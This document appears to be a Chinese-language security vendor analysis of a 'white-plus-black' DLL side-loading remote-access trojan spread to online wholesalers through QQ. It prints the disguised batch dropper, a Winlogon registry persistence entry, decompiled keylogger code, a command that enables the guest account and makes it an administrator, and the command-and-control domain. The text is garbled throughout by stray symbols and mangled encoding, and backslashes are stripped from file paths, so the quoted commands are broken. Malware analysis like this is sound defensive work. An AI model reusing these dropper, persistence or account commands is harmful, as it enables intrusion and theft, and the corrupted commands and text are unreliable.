前言
近日,360安全中心監(jiān)測到有不法分子通過添加QQ好友的形式�,以溝通商品交易的名義發(fā)送名為“這幾天團(tuán)隊(duì)的量”的文件,一旦接收并打開文件,電腦將被遠(yuǎn)程控制���,不法分子可進(jìn)一步盜取隱私及財(cái)物����、甚至植入病毒實(shí)現(xiàn)敲詐勒索等操作����。
360安全中心對(duì)該樣本進(jìn)行分析發(fā)現(xiàn)�,“這幾天團(tuán)隊(duì)的量.rar”是一個(gè)將木馬打包在其中的壓縮包文件,投遞目標(biāo)主要是網(wǎng)絡(luò)批發(fā)商��。牧馬人通過將木馬偽裝成數(shù)量詳情圖片文件�����,在與商家溝通的期間��,發(fā)送木馬文件給商家���,引誘商家中招�����。
當(dāng)網(wǎng)店批發(fā)商在接受到文件后����,解壓出文件夾并點(diǎn)擊了文件夾中的“寶貝批發(fā)數(shù)量.com”后,木馬就會(huì)在后臺(tái)偷偷跑起來���。
圖0:解壓后文件夾內(nèi)容
文件夾結(jié)構(gòu)
┌─ 寶貝批發(fā)數(shù)量.com
│
├─ setup.ini
│
└─ Data
├─ 2018.jpg
│
├─ 360666
│ ├─ 360666.PNG
│ ├─ date
│ ├─ QQAPP.exe
│ ├─ Readme.txt
│ ├─ TEMA
│ ├─ WPS_office2016.lnk
│ └─ WPS_office2017.lnk
│
└─ Order
├─ m.exe
├─ WoodTorch.exe
└─ WPS.JPG
分析
寶貝批發(fā)數(shù)量.com
該文件其實(shí)為白文件�����,它帶有艾威梯科技(北京)有限公司數(shù)字簽名�。
圖1:白文件 簽名信息
程序在執(zhí)行起來后會(huì)讀取同目錄下的setup.ini文件����,根據(jù)配置文件中Install項(xiàng)里的CmdLine執(zhí)行命令。而文件常規(guī)打開是一堆亂碼�����,在十六進(jìn)制試圖下可以清楚看到Cmdline命令����。
圖2:記事本瀏覽視圖
圖3:十六進(jìn)制瀏覽視圖
Cmdline命令如下:
[Install]
CmdLine=DataOrderWoodTorch.exe execmd DataOrderm.exe /c DataOrderm.exe `< DataOrderWPS.JPG
WoodTorch.exe
被寶貝批發(fā)數(shù)量.com加載起來的WoodTorch.exe,實(shí)質(zhì)上是命令行工具Nircmd��。而上述的命令語句則是通過execmd這個(gè)執(zhí)行命令指示符,在不顯示任何信息至屏幕的情況下執(zhí)行下面的語句:
DataOrderm.exe /c DataOrderm.exe `< DataOrderWPS.JPG
m.exe
系統(tǒng)的cmd程序��,它的作用是用于加載WPS.JPG這個(gè)批處理文件����。
WPS.JPG
從文件名上來看它是一個(gè)圖片,但內(nèi)容為批處理腳本��。內(nèi)容如下:
圖4:WPS.JPG
@echo off
cmd.exe /c start data2018.jpg
md c:microsoft
copy Data360666Readme.txt c:microsoftReadme.txt
copy Data360666date c:microsoftdate
copy Data360666360666.PNG c:microsoft360666.PNG
copy Data360666QQAPP.exe c:microsoftQQAPP.exe
copy /b Data360666TEMA+ Data360666WPS_office2016.lnk+Data360666WPS_office2017.lnk c:microsoftcommon.dll
start C:MicrosoftQQApp.exe
start c:windowssystem32 undll32.exe advpack.dll,LaunchINFSection c:microsoft360666.png,DefaultInstall
pause
行為分析:
1. 打開Data目錄下的2018.jpg圖片
2. 創(chuàng)建目錄 c:microsoft目錄
3. 拷貝Data360666目錄下的Readme.txt�����、date���、360666.PNG、QQAPP.exe到c:microsoft目錄中
4. 合并Data360666目錄下的TEMA���、WPS_office2016.lnk�、WPS_office2017.lnk為c:microsoft目錄下common.dll
5. 執(zhí)行C:MicrosoftQQApp.exe
6. 執(zhí)行c:windowssystem32 undll32.exe advpack.dll,LaunchINFSection c:microsoft360666.png,DefaultInstall
步驟1的目的是為了讓批發(fā)商覺得自己真的是打開了一張圖片
圖5:數(shù)量圖
步驟2-5為白加黑木馬部分
QQAPP.exe是帶有騰訊簽名的白文件�,由于QQAPP.exe在調(diào)用Common.dll時(shí),沒有對(duì)Common.dll進(jìn)行校驗(yàn)�。牧馬人通過將惡意文件拆分成TEMA、WPS_office2016.lnk��、WPS_office2017.lnk三個(gè)文件,在程序執(zhí)行過程中合并成common.dll�。當(dāng)QQAPP.exe執(zhí)行的時(shí)候,惡意的common.dll就會(huì)被自動(dòng)加載����,從而執(zhí)行惡意代碼。
l 步驟6的目的是通過360666.png中的配置信息讓QQAPP.exe能夠在重啟后自啟動(dòng)���,達(dá)到木馬駐留受害者電腦的目的��。
[Version]
Signature="$Windows NT$"
[Defaultinstall]
addREG=Gc
[Gc]
HKCU,"SoftwareMicrosoftWindows NTCurrentVersionWinlogon","shell","0x00000000","Explorer.exe,C:MicrosoftQQApp.exe"
common.dll
InitBugReport :
a. 通過訪問www[.]baidu[.]com測試網(wǎng)絡(luò)連通性���,如果訪問失敗則ExitProcess。
圖6:測試網(wǎng)絡(luò)連通性
b. 導(dǎo)出函數(shù)為空����,偽造源文件導(dǎo)出函數(shù)SetBugReportUin、ValidateBugReport����。
void __cdecl TXBugReport::SetBugReportUin()
{
sub_10001F44();
}
void sub_10001F44()
{
;
}
void __cdecl TXBugReport::ValidateBugReport()
{
sub_10001F4B();
}
void sub_10001F4B()
{
;
}
c. 解密Readme.txt,解密后的Readme_dump文件為PeLoad�。它負(fù)責(zé)讀取解密同目錄下的date文件,并創(chuàng)建新的線程執(zhí)行解密后的date�。
圖7:創(chuàng)建線程
Readme_dump(解密后的Readme.txt)
a. 干擾函數(shù)
void Sleeps()
{
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
Sleep(0);
}
b. 解密date文件����。
圖8:解密算法
c. 讀取解密同目錄下的date文件��,并創(chuàng)建新的線程執(zhí)行解密后的date���。
圖9:加載木馬
木馬主體(解密后的date)
a. 判斷C:ProgramDataMicrosoftWindowsStart MenuTorchwood.lnk文件是否存在,存在則刪除文件��。
b. 通過加密字符串T1hEVVFMWFNEVhVfVlsr解密出CC�����。
圖10:解密CC地址
c. 網(wǎng)絡(luò)通訊
圖11:連接CC
d. 鍵盤記錄����,通過異或0x62加密后保存到C:Windowssystem32ForShare.key�。
while ( 1 )
{
v2 = GetKeyState(16); // 獲取shift鍵狀態(tài)
v3 = dword_BCEAF4[v8 / 4];
if ( ((unsigned __int16)GetAsyncKeyState(dword_BCEAF4[v8 / 4]) >> 8) & 0x80 ) // 獲取指定按鍵狀態(tài)
{
if ( GetKeyState(20) && v2 > -1 && v3 > 64 && v3 < 93 )
{
*(&v5 + v3) = 1;
}
else
{
if ( !GetKeyState(20) )
goto LABEL_38;
if ( v2 >= 0 )
goto LABEL_22;
if ( v3 > 64 && v3 < 93 )
{
*(&v5 + v3) = 2;
}
else
{
LABEL_38:
if ( v2 >= 0 )
{
LABEL_22:
*(&v5 + v3) = 4;
goto LABEL_34;
}
*(&v5 + v3) = 3;
}
圖12:保存鍵盤記錄
e. 清除事件日志
圖13:清除事件日志
f. 遍歷進(jìn)程,檢測殺軟
圖14:殺軟字符串
圖15:遍歷進(jìn)程
g.設(shè)置guest 密碼�����,并添加到管理員組��。
net user guest /active:yes && net user guest 123456 && net localgroup administrators guest /add
h. 其余功能主要還有文件管理�、注冊(cè)表管理、進(jìn)程管理���、shell操作�、下載文件�、更新客戶端、卸載客戶端等
追溯
根據(jù)CC地址duanjiuhao.top的域名信息獲取到了域名持有者的姓名����、郵箱、手機(jī)號(hào)�。
圖16:whois信息
最后
年關(guān)將近,不法分子試圖利用這些“白加黑”遠(yuǎn)控木馬從中招用戶那“謀財(cái)”�����。目前��,360安全衛(wèi)士已經(jīng)對(duì)該類木馬進(jìn)行防御及查殺���,在此也提醒網(wǎng)民����,提防來歷不明的文件��、鏈接,同時(shí)開啟安全軟件����,臨近新年,為自己的隱私及財(cái)產(chǎn)安全加上一把鎖��。
文章內(nèi)容僅供閱讀����,不構(gòu)成投資建議,請(qǐng)謹(jǐn)慎對(duì)待���。投資者據(jù)此操作�����,風(fēng)險(xiǎn)自擔(dān)����。
京公網(wǎng)安備 11010502041587號(hào)